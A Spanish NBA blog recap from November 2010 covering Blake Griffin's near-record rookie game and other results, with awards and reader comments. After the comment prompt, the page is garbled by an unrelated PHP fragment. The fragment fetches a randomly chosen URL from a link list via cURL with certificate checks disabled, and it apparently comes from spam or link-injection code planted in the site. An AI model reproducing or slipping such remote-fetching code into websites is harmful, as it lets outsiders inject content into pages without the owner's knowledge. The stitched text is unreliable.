La Crónica (20/11/2010)

21 de November de 2010 por TheDeerHunter

Hasta 9 partidos de los que hablar de la jornada de Sábado noche. Normalmente lo hacemos siguiendo un orden aproximado a la relevancia de los equipos en la clasificación. Sin embargo, yo hoy abro con esto:

¿Qué se puede hacer para que los Clippers ganen un triste partido? Ni una exhibición tan asombrosa como la de Blake Griffin anoche fue suficiente, para alivio de los Knicks. Estamos hablando de la 2ª mejor actuación global de un rookie en la historia de la liga. Ni Chamberlain, ni Jordan… sólo superada por Oscar Robertson el 15 de Noviembre de 1960. Justo 50 años y 5 días después de aquellos 44 puntos, 15 rebotes y 11 asistencias. A Blake sólo le han faltado 4 asistencias para igualarlo. Perdonadme la expresión: “Para cagarse”.

Mientras, en el mundo real, los Spurs continúan a lo suyo en la cima de la liga. A Parker le sienta estupendamente la soltería y Splitter firmó su primer gran partido desde que llegó a la liga. Los Cavs poco pudieron hacer ante un juego colectivo tan completo.

Algo más abajo en las tablas de clasificación tenemos a Orlando, que anoche pasaron a los Celtics al frente del Este. Asistimos a un precioso duelo de pívots puros entre Howard y Roy Hibbert. La más que esperada buena actuación de Rashard abriendo espacios desequilibró la balanza. Unos flojos Magic van líderes de conferencia. ¿Qué pasará si se entonan? Lo cierto es que si son los Heat los que tienen que ser la alternativa frente a los Celtics cada día dan menos miedo. Anoche cayeron en Memphis muy mermados por una lesión de Wade. Gay pasó de villano a héroe tras regalar un inoportuno balón a LeBron para que les empataran un partido que tenían ganado, pero después para anotar un clutch que endosaba a los “beach boys” la derrota nº 5. Y eso que los ositos no están para tirar cohetes, Mayo y Zach han caido al banquillo… les salió bien la jugada, por esta vez.

Los Thunder sin Durant siguen en la cresta de la ola. Ayer salieron vivos de Milwaukee por los pelos, mostrando su alto rendimiento fuera de casa. Nada menos que 5 victorias – 1 derrota lejos de Oklahoma City. Los Mavs hicieron lo propio ante la difícil visita a Atlanta, aprovechándose de un mal partido de Joe Johnson.  Los Bobcats fueron los que velaron por el prestigio de su conferencia, gracias al primer triple doble de Stephen Jackson ante unos Suns todavía sin Nash.

Finalmente los Nuggets sudaron para doblegar a los Nets y los Jazz dieron buena cuenta de los mermados Blazers.

Por último, se está gestando una operación que podría resultar muy beneficiosa para uno de los nuestros: El tema sería Jarret Jack, David Anderson y Marcus Banks a los Hornets a cambio de Stojakovic y Jerrid Bayless. Curioso lo que ha pasado con este último.

PREMIOS

MVP: Si nos ponemos le daríamos todos los premios a Blake Griffin. Ajustando un poco más tenemos grandes actuaciones de Melo, de Amaré, de Howard… sin embargo, yo me quedaría con el triple doble de Stephen Jackson y sus 24 puntos, 10 rebotes, 10 asistencias y un par de robos y de tapones. Doble mérito de hacer que su equipo pase de anotar sus 90 puntejos de media a los 123 de ayer y logrando la victoria que tanta falta les hace.

El rookie: No hay otro nombre. Actuación de Supermán Griffin. No alcanzó las estadísticas de Robertson… pero dudamos que aquel hiciera entonces el animal destrozando el aro como lo hizo Blake anoche.

La sorpresa: El factor clave de Utah para lograr la victoria en el Rose Garden no fue ni Deron, ni Al Jefferson, ni Millsap… fue CJ Miles el mejor de los suyos.

La decepción: Además de que los compañeros de Blake no fueran capaces de hacer valer el partidazo tan monstruoso de éste, tenemos el 6 de 24 que se cascaron entre Joe Johnson y Jamal Crawford en la derrota de los Hawks.

El mayor esfuerzo en vano: Quitando una vez más lo de Griffin… Que el 20-20 de Al Horford no sirva para ganar tiene delito.

Comenta

11 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Que pedazo de mates y que pedazo de actuacion de Blake Griffin, brutal la temporada de este chaval sobretodo despues de estar un año en blanco.

      Citar

  2. -=TheKing=- dice:
    #2

    Ojo con las espuelas que a lo tonto a lo tonto y con un Duncan no muy efectivo mira dónde están.

      Citar

  3. Jona dice:
    #3

    Impresionante BG32 XD madre mia de mi vida

      Citar

  4. KB # 24 dice:
    #4

    Con actuaciones así el ROY no está al alcanze de John Wall…

      Citar

  5. scriers dice:
    #5

    Madre mía, qué mates. IMPRESIONANTE 😀

      Citar

  6. M dice:
    #6

    Tremendo,,,lo que hace este chico, y que ni así puedan ganar a un equipo que no está entre los mejores, como New York

      Citar

  7. Tiago dice:
    #7

    Blake me está cerrando la boca, parece que a Wall le va a costar sudor y lágrimas el poder ganar el ROY.

    Primero gran partido de Splitter en el primer partido que le dan minutos, si mantiene el nivel será importante.

      Citar

  8. -=TheKing=- dice:
    #8

    Rumores de transpaso de Nash, si nos quitan a éste de los Suns me temo lo peor. Hasta que se pire Alvin por mosqueo.

      Citar

  9. Txusma dice:
    #9

    Madre mía! Vaya muelles tiene también este chico. Sinceramente, me gustaría que los 3 rookies se asentaran y los Clippers tuvieran una buena época de éxitos.
    Sobre el ROY aún es pronto para decidir quien se lo lleva pero no hemos de olvidar que hace bien poquito John Wall se cascó un triple doble, que no es moco de pavo. Lo único que sé es que estamos ante 2 super clases. De seguir a este ritmo podemos ver otro premio ex-aquo.

      Citar

  10. Denise dice:
    #10

    Vaya partidito el Raptors-Celtics.
    A falta de 20 segundos, pierden los Raptors de 3 y sacan de banda, Weems hace unos pasos de salida de esos que me dan asco sólo de verlos, y mete una bandeja; después Allen pierde un balón tonto y le cae en las manos a Calderón. Amir Johnson se juega un tiro forzadísimo, le pitan a favor una falta rigurosísima, mete los 2 tiros libres y ganan los dinosaurios.

      Citar

  11. Scriers dice:
    #11

    La verdad es que el final raptors celtic ha sido un poco tonto. Aun asi tuvo un tiro los celtics para ganar. Es curioso que toronto haya ganado a equipos como orlando y celtics y luego perdido contra otros equipo de su liga. Yo lo sigo viendo un equipo sin clara distribucion de roles. Quien es mas importante weems, barbosa, derozan o Kleiza. Por supuesto que todos deben serlo pero llegan jugadas decisivas y te ves a amir johnson haciendo eso… nose nose…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>